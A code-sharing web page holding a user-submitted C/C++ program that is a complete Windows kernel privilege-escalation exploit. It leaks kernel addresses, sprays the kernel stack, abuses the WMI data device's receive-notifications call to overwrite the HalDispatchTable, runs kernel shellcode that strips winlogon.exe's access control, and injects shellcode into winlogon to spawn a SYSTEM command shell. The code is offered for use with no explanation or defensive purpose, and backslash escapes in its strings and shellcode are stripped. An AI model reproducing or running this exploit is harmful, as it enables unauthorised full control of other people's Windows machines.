Ask Question

Name:
Title:
Your Question:

Answer Question

Name:
Your Answer:
User Submitted Source Code!


Description:
  werdsv
Language: C/C++
Code:
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>
 
 
typedef union {
    HANDLE Handle;
    ULONG64 Handle64;
    ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;
 
typedef struct {
    ULONG HandleCount;
    ULONG Action;
    HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
    HANDLE3264 UserModeProcess;
    HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;
 
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
 
typedef struct {
    IN VOID * ObjectAttributes;
    IN ACCESS_MASK DesiredAccess;
 
    OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;
 
typedef enum _KPROFILE_SOURCE {
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
 
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
 
typedef struct _DESKTOPINFO
{
    /* 000 */ PVOID        pvDesktopBase;
    /* 008 */ PVOID        pvDesktopLimit;
 
} DESKTOPINFO, *PDESKTOPINFO;
 
 
typedef struct _CLIENTINFO
{
    /* 000 */ DWORD             CI_flags;
    /* 004 */ DWORD             cSpins;
    /* 008 */ DWORD             dwExpWinVer;
    /* 00c */ DWORD             dwCompatFlags;
    /* 010 */ DWORD             dwCompatFlags2;
    /* 014 */ DWORD             dwTIFlags;
    /* 018 */ DWORD             filler1;
    /* 01c */ DWORD             filler2;
    /* 020 */ PDESKTOPINFO      pDeskInfo;
    /* 028 */ ULONG_PTR         ulClientDelta;
 
} CLIENTINFO, *PCLIENTINFO;
 
typedef struct _HANDLEENTRY {
    PVOID  phead;
    ULONG_PTR  pOwner;
    BYTE  bType;
    BYTE  bFlags;
    WORD  wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
 
typedef struct _SERVERINFO {
    DWORD dwSRVIFlags;
    DWORD64 cHandleEntries;
    WORD wSRVIFlags;
    WORD wRIPPID;
    WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
 
typedef struct _SHAREDINFO {
    PSERVERINFO psi;
    PHANDLEENTRY aheList;
    ULONG HeEntrySize;
    ULONG_PTR pDispInfo;
    ULONG_PTR ulSharedDelta;
    ULONG_PTR awmControl;
    ULONG_PTR DefWindowMsgs;
    ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
 
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 
typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);
 
DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;
 
LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
 
DWORD getProcessId(wchar_t* str)
{
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;
    DWORD PID;
 
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        return 0;
    }
 
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);
        return 0;
    }
 
    do
    {
        if (!wcscmp(pe32.szExeFile, str))
        {
            wprintf(L"Process: %s foundn", pe32.szExeFile);
            PID = pe32.th32ProcessID;
            return PID;
        }
    } while (Process32Next(hProcessSnap, &pe32));
    return 0;
}
 
void Launch()
{
    void* pMem;
    char shellcode[] =
        "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
        "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
        "x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2"
        "xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85"
        "xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3"
        "x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"
        "x01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58"
        "x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8b"
        "x04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xff"
        "xe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00"
        "x00x00x50x68x31x8bx6fx87xffxd5xbbxe0x1dx2ax0a"
        "x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75"
        "x05xbbx47x13x72x6fx6ax00x53xffxd5x63x6dx64x2e"
        "x65x78x65x00";
 
    wchar_t* str = L"winlogon.exe";
    DWORD PID = getProcessId(str);
    HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
    HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
 
BOOL leakHal()
{
    _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
    PRTL_PROCESS_MODULES pModuleInfo;
    DWORD ntoskrnlBase;
    DWORD HalDTUser, HalDTOffset;
    HMODULE userKernel;
 
    pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pModuleInfo == NULL)
    {
        printf("Could not allocate memoryn");
        return FALSE;
    }
    NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
    ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
    userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (userKernel == NULL)
    {
        printf("Could not load ntoskrnl.exen");
        return FALSE;
    }
 
    HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
    HalDTOffset = HalDTUser - (DWORD)userKernel;
    g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
    return TRUE;
}
 
BOOL setup()
{
    LoadLibraryA("user32.dll");
 
    wc.cbSize = sizeof(WNDCLASSEX);
    wc.style = 0;
    wc.lpfnWndProc = WProc;
    wc.cbClsExtra = 0;
    wc.cbWndExtra = 0;
    wc.hInstance = NULL;
    wc.hCursor = NULL;
    wc.hIcon = NULL;
    wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
    wc.lpszMenuName = NULL;
    wc.lpszClassName = g_windowClassName;
    wc.hIconSm = NULL;
 
    if (!RegisterClassEx(&wc))
    {
        printf("Failed to register window: %dn", GetLastError());
        return FALSE;
    }
    g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
    if (g_window == NULL)
    {
        printf("Failed to create window: %dn", GetLastError());
        return FALSE;
    }
 
    g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
    g_UserHandleTable = g_pSharedInfo->aheList;
    g_pServerInfo = g_pSharedInfo->psi;
 
    return TRUE;
}
 
DWORD leakWndAddr(HWND hwnd)
{
    DWORD addr = 0;
    HWND kernelHandle = NULL;
 
    for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
    {
        kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
        if (kernelHandle == hwnd)
        {
            addr = (DWORD)g_UserHandleTable[i].phead;
            break;
        }
    }
    return addr;
}
 
VOID SprayKernelStack() {
    g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
    if (ZwMapUserPhysicalPages == NULL)
    {
        printf("Could not get ZwMapUserPhysicalPagesn");
        return;
    }
    BYTE buffer[4096];
    DWORD value = g_HalDispatchTable - 0x3C + 0x4;
    for (int i = 0; i < sizeof(buffer) / 4; i++)
    {
        memcpy(buffer + i * 4, &value, sizeof(DWORD));
    }
    printf("Where is at: 0x%xn", buffer);
    ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
 
__declspec(noinline) int Shellcode()
{
    __asm {
        mov eax, kHandle // WND - Which window? Check this
        mov eax, [eax + 8] // THREADINFO
        mov eax, [eax] // ETHREAD
        mov eax, [eax + 0x150] // KPROCESS
        mov eax, [eax + 0xb8] // flink
        procloop:
        lea edx, [eax - 0xb8] // KPROCESS
        mov eax, [eax]
        add edx, 0x16c // module name
        cmp dword ptr[edx], 0x6c6e6977 // �winl� for winlogon.exe
        jne procloop
        sub edx, 0x170
        mov dword ptr[edx], 0x0 // NULL ACL
        ret
    }
}
 
int main() {
    DWORD dwBytesReturned;
    HANDLE threadhandle;
    WMIRECEIVENOTIFICATION buffer;
    CHAR OutPut[1000];
 
    if (!setup())
    {
        printf("Could not setup windown");
        return 0;
    }
 
 
    PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    kHandle = (void*)leakWndAddr(g_window);
    memset(userSC, 0x41, 0x1000);
    memcpy(userSC, Shellcode, 0x40);
 
 
    if (!leakHal())
    {
        printf("Could not leak Haln");
        return 0;
    }
    printf("HalDispatchTable is at: 0x%xn", g_HalDispatchTable);
 
    DWORD value = (DWORD)userSC;
    PBYTE buff = (PBYTE)&buffer;
    for (int i = 0; i < sizeof(buffer) / 4; i++)
    {
        memcpy(buff + i * 4, &value, sizeof(DWORD));
    }
    printf("What is at: 0x%xn", buff);
 
    buffer.HandleCount = 0;
    buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
    buffer.UserModeProcess.Handle = GetCurrentProcess();
 
    HANDLE hDriver = CreateFileA("\\.\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDriver != INVALID_HANDLE_VALUE) {
        SprayKernelStack();
 
        if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
            return 1;
        }
 
    }
    _NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
    ULONG result;
    KPROFILE_SOURCE stProfile = ProfileTotalIssues;
    NtQueryIntervalProfile(stProfile, &result);
    printf("SYSTEM shell commingn");
    Launch();
    printf("All done, exitingn");
 
    return 0;
}
          
Comments: